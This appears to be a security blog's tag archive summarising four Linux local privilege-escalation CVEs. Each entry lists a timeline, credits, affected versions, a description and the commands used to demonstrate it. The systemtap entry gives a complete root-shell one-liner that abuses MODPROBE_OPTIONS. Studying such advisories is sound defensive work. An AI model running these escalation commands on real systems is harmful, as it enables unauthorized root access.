Tag Archives: Kernel

CVE-2015-8660 Linux Kernel OverLay Fail

Timeline :

Vulnerability discovered by Nathan Williams and reported to vendor
Patched by the vendor the 2015-12-04
Advisory release the 2015-12-28
PoC provided by rebel the 2015-01-06

PoC provided by :

rebel

Reference(s) :

CVE-2015-8660

Affected version(s) :

Linux kernel through 4.3.3

Tested onĀ :

Ubuntu Server 64-bit 15.10 with python installed

Description :

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

Commands :

gcc -o CVE-2015-8660 CVE-2015-8660.c
id
./CVE-2015-8660
id

CVE-2013-1763 SOCK_DIAG vulnerability in Linux kernel 3.3 to 3.8 Demo

Timeline :

Vulnerability discovered and reported to the vendor by Mathias Krause the 2013-02-23
PoC provided the 2013-02-25

PoC provided by :

Mathias Krause
SynQ

Reference(s) :

CVE-2013-1763

Affected version(s) :

Linux Kernel 3.3 to 3.8

Tested on Ubuntu 12.10 x86 with :

Kernel 3.5.0-17-generic

Description :

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX — the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

Commands :

id
gcc -o CVE-2013-1763 CVE-2013-1763.c
./CVE-2013-1763 Ubuntu
id

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Timeline :

Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Require “systemtap-runtime” on Debian

id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id